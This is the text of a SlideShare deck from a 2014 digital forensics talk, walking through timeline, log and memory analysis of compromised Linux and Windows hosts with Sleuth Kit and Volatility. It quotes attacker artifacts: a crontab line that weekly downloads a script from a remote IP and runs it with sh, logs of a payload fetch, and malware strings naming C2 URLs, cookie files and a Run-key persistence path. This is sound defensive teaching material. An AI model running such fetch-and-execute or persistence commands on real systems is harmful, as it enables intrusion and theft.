SlideShare ist ein Scribd-Unternehmen logo

Adventures in Digital Forensics

_
_xhr_

My talk about post-mortem and volatily memory forensics from the EasterHegg 2014.

Technologie
1 von 52
Downloaden Sie, um offline zu lesen
Adventures in Digital Forensics xhr xhr giessen.ccc.de
xhr Easterhegg 2014 2 $ whoami
xhr Easterhegg 2014 3 What is Digital Forensics?
xhr Easterhegg 2014 4 What the media thinks...
xhr Easterhegg 2014 5 + Flickr. West Midlands Police. CC-BY-2.0
xhr Easterhegg 2014 6 What it is really about ...
xhr Easterhegg 2014 7 Flickr. Naughty Architect. CC-BY-2.0
xhr Easterhegg 2014 8 Srsly? Crawling a Shitload of Data * Hey, that's cool. It's Big Data[TM] !!1 *
xhr Easterhegg 2014 9 Discover unknown malware * sadly, known as well :/ *
xhr Easterhegg 2014 11 Learn new Things[TM]
xhr Easterhegg 2014 12 Two Approaches
xhr Easterhegg 2014 13 Disc Forensics
xhr Easterhegg 2014 14 Memory Forensics
xhr Easterhegg 2014 15 Post-mortem Analysis
xhr Easterhegg 2014 16 MAC Time Analysis
xhr Easterhegg 2014 17 Tim e stam pM AC User Perm issions Path Size Time Last Modified Last Accessed Last Changed Birth time
xhr Easterhegg 2014 18 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
xhr Easterhegg 2014 19 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
xhr Easterhegg 2014 20 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
xhr Easterhegg 2014 21 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
xhr Easterhegg 2014 22 On-disk Analysis
xhr Easterhegg 2014 23 host:/tmp/.ICE­unix/­log# ls ­l total 5088 ­rw­r­­r­­  1 www­data www­data     238 Dec 17 16:26   drwxr­xr­x  2 www­data www­data    4096 Dec 15 04:01 bin ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.1 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.2 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.3 drwxr­xr­x  3 www­data www­data      22 Dec 14 12:41 doc drwxr­xr­x  5 www­data www­data     126 Dec 15 04:01 include drwxr­xr­x  4 www­data www­data    4096 Dec 17 16:26 lib drwxr­xr­x  3 www­data www­data      17 Dec 14 12:41 man ­rwxr­xr­x  1 www­data www­data       0 Dec 14 03:24 rsyslogd ­rw­r­­r­­  1 www­data www­data 3077358 Dec 16 16:53 sshc.tgz drwxr­xr­x  6 www­data www­data      71 Dec 15 03:53 ssl
xhr Easterhegg 2014 24 Crontab FTW! @weekly wget ­q hxxp://221.132.37.XX/scen  ­O /tmp/sh; sh /tmp/sh; rm ­rd /tmp/sh
xhr Easterhegg 2014 25 Log Files
xhr Easterhegg 2014 26 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 27 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 28 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 29 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 30 Write Remote Logs!!1
xhr Easterhegg 2014 31 And use Smart Indexing loghost:/syslog/live $ du -hs 4.5T . :)
xhr Easterhegg 2014 32 Memory Forensics 101
xhr Easterhegg 2014 33 Mem dump == IDDQD
xhr Easterhegg 2014 34 Linux → Windows
xhr Easterhegg 2014 35 Details about the Victim Determining profile based on KDBG search...           Suggested Profile(s) : WinXPSP2x86,  WinXPSP3x86 (Instantiated with WinXPSP2x86)                       PAE type : PAE                            DTB : 0x28a000L                           KDBG : 0x80545ce0           Number of Processors : 1      Image Type (Service Pack) : 3 $ file ram.elf  ram.elf: ELF 64­bit LSB core file x86­64,  version 1 (SYSV) $ ls ­l ram.elf  293M ­rw­­­­­­­ 1 xhr xhr 293M Apr 19 15:29  ram.elf
xhr Easterhegg 2014 36 Check Networking
xhr Easterhegg 2014 37 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
xhr Easterhegg 2014 38 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
xhr Easterhegg 2014 39 Check IE History
xhr Easterhegg 2014 40 admin@about:Home admin@http://127.0.0.1:1088/app/index.html admin@http://ccc.de admin@http://ccc.de/de/rss/updates.rdf admin@http://ccc.de/de/rss/updates.xml admin@http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://edpn.ebay.com/engagement?INIT=575302488402|22076974|707189966101462|1|0| 1||http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://go.microsoft.com/fwlink/?LinkID=121792 admin@http://home.microsoft.com admin@https://download­installer.cdn.mozilla.net/pub/firefox/releases/26.0/win32/en­ US/Firefox%20Setup%20Stub%2026.0.exe admin@http://update.microsoft.com/favicon.ico admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en­us admin@http://update.microsoft.com/microsoftupdate/v6/resultslist.aspx?ln=en­us&id=6 admin@http://windowsupdate.microsoft.com/favicon.ico admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx?ln=en­us admin@http://windowsupdate.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en­ us&id=6 admin@http://windowsupdate.microsoft.com/windowsupdate/v6/splash.aspx?ln=en­us&page=8 admin@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome admin@http://www.mozilla.org/en­US admin@http://www.mozilla.org/en­US/products/download.html?product=firefox­ stub&os=win&lang=en­US admin@http://www.msn.com admin@http://www.youporn.com/rss admin@res://ief admin@res://ieframe.dll/tabswelcome.htm
xhr Easterhegg 2014 42 Any Malicious Processes?
xhr Easterhegg 2014 43 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
xhr Easterhegg 2014 44 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
xhr Easterhegg 2014 45 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324     10      435  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      939  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81887620 KB01065453.exe         3564   1156      1       15 
xhr Easterhegg 2014 46 Process Dump
xhr Easterhegg 2014 47
xhr Easterhegg 2014 48 Putting it into IDA Pro * Having a Pro license totally rocks :) *
xhr Easterhegg 2014 49 Detailz kthxbye! 000000011410   000000411410      0   http://113.130.65.77:8080/mx5/C/in/ 000000011458   000000411458      0   http://199.71.212.78:8080/mx5/C/in/ 0000000114A0   0000004114A0      0   http://211.191.168.98:8080/mx5/C/in/ 0000000114F0   0000004114F0      0   http://195.250.139.10:8080/mx5/C/in/ 000000011540   000000411540      0   http://173.224.208.60:8080/mx5/C/in/ 000000011590   000000411590      0   http://46.51.218.71:8080/mx5/C/in/ 0000000115D8   0000004115D8      0   http://89.97.55.33:8080/mx5/C/in/ 000000011620   000000411620      0   http://71.89.140.153:8080/mx5/C/in/ 000000011668   000000411668      0   http://195.111.72.46:8080/mx5/C/in/ 0000000116B0   0000004116B0      0   http://84.53.217.109:8080/mx5/C/in/ 0000000116F8   0000004116F8      0   http://78.46.64.17:8080/mx5/C/in/ 0000000111F8   0000004111F8      0   SoftwareMicrosoftWindows NTC%08X 000000011254   000000411254      0   MozillaFirefoxProfiles 000000011288   000000411288      0   cookies.* 00000001129C   00000041129C      0   Macromedia 0000000112BC   0000004112BC      0   firefox.exe 0000000112D4   0000004112D4      0   explorer.exe 000000011C60   000000411C60      0   SoftwareMicrosoftWindows NTS%08X 000000011CEB   000000411CEB      0   sKB%08d.exe 000000011D08   000000411D08      0   SoftwareMicrosoftWindowsCurrentVersionRun
xhr Easterhegg 2014 50 Selected Tools
xhr Easterhegg 2014 51 The Sleuth Kit http://www.sleuthkit.org
xhr Easterhegg 2014 52 The Volatility Framework https://code.google.com/p/volatility/
xhr Easterhegg 2014 53 Fin!
xhr Easterhegg 2014 54 Q & A xhr xhr giessen.ccc.de @ @_xhr_

Empfohlen

LISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial HandoutsLISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial HandoutsTobias Oetiker
 
SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5Ben Abdallah Helmi
 
Fabio Ghioni
Fabio GhioniFabio Ghioni
Fabio GhioniFabio Ghioni
 
Configuring Greenstone's OAI server
Configuring Greenstone's OAI serverConfiguring Greenstone's OAI server
Configuring Greenstone's OAI serverDiego Spano
 
User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)Stacy Deere
 
Hibernate reference pt-br
Hibernate reference pt-brHibernate reference pt-br
Hibernate reference pt-brLeonardo Brancalhão
 
Collaboration with Eclipse final
Collaboration with Eclipse finalCollaboration with Eclipse final
Collaboration with Eclipse finalKenu, GwangNam Heo
 
ORCID ED Report 10292013
ORCID ED Report 10292013ORCID ED Report 10292013
ORCID ED Report 10292013ORCID, Inc
 

Empfohlen

LISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial HandoutsLISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial HandoutsTobias Oetiker
 
SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5Ben Abdallah Helmi
 
Fabio Ghioni
Fabio GhioniFabio Ghioni
Fabio GhioniFabio Ghioni
 
Configuring Greenstone's OAI server
Configuring Greenstone's OAI serverConfiguring Greenstone's OAI server
Configuring Greenstone's OAI serverDiego Spano
 
User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)Stacy Deere
 
Hibernate reference pt-br
Hibernate reference pt-brHibernate reference pt-br
Hibernate reference pt-brLeonardo Brancalhão
 
Collaboration with Eclipse final
Collaboration with Eclipse finalCollaboration with Eclipse final
Collaboration with Eclipse finalKenu, GwangNam Heo
 
ORCID ED Report 10292013
ORCID ED Report 10292013ORCID ED Report 10292013
ORCID ED Report 10292013ORCID, Inc
 
What's Next with Government Big Data
What's Next with Government Big Data What's Next with Government Big Data
What's Next with Government Big Data GovLoop
 
Lacerte Helpful Resources
Lacerte Helpful ResourcesLacerte Helpful Resources
Lacerte Helpful Resourcesintuitaccts
 
Web service overview
Web service overviewWeb service overview
Web service overviewSaran Yuwanna
 
缓存技术浅谈
缓存技术浅谈缓存技术浅谈
缓存技术浅谈Robbin Fan
 
AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012AVG Technologies AU
 
Social Networking
Social NetworkingSocial Networking
Social NetworkingCaroline Cerveny
 
Montando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando MassenMontando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando MassenTchelinux
 
Caderno SISP 2012
Caderno SISP 2012Caderno SISP 2012
Caderno SISP 2012GovBR
 
Especial Linux Magazine Software Público
Especial Linux Magazine Software PúblicoEspecial Linux Magazine Software Público
Especial Linux Magazine Software PúblicoGovBR
 
SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2Ben Abdallah Helmi
 
Tomcat Maven Plugin
Tomcat Maven PluginTomcat Maven Plugin
Tomcat Maven PluginOlivier Lamy
 
Nosotros Elmedio
Nosotros ElmedioNosotros Elmedio
Nosotros ElmedioEspacio Público
 
Mision y vision .pdf ss
Mision y vision .pdf ssMision y vision .pdf ss
Mision y vision .pdf ssRonnyonam
 
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...Quinnipiac University
 
State of virtualisation -- 2012
State of virtualisation -- 2012State of virtualisation -- 2012
State of virtualisation -- 2012Jonathan Sinclair
 
El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0Pablo Olmeda
 
Django - the first five years
Django - the first five yearsDjango - the first five years
Django - the first five yearsJacob Kaplan-Moss
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 

Weitere ähnliche Inhalte

Andere mochten auch

What's Next with Government Big Data
What's Next with Government Big Data What's Next with Government Big Data
What's Next with Government Big Data GovLoop
 
Lacerte Helpful Resources
Lacerte Helpful ResourcesLacerte Helpful Resources
Lacerte Helpful Resourcesintuitaccts
 
Web service overview
Web service overviewWeb service overview
Web service overviewSaran Yuwanna
 
缓存技术浅谈
缓存技术浅谈缓存技术浅谈
缓存技术浅谈Robbin Fan
 
AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012AVG Technologies AU
 
Montando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando MassenMontando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando MassenTchelinux
 
Caderno SISP 2012
Caderno SISP 2012Caderno SISP 2012
Caderno SISP 2012GovBR
 
Especial Linux Magazine Software Público
Especial Linux Magazine Software PúblicoEspecial Linux Magazine Software Público
Especial Linux Magazine Software PúblicoGovBR
 
SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2Ben Abdallah Helmi
 
Tomcat Maven Plugin
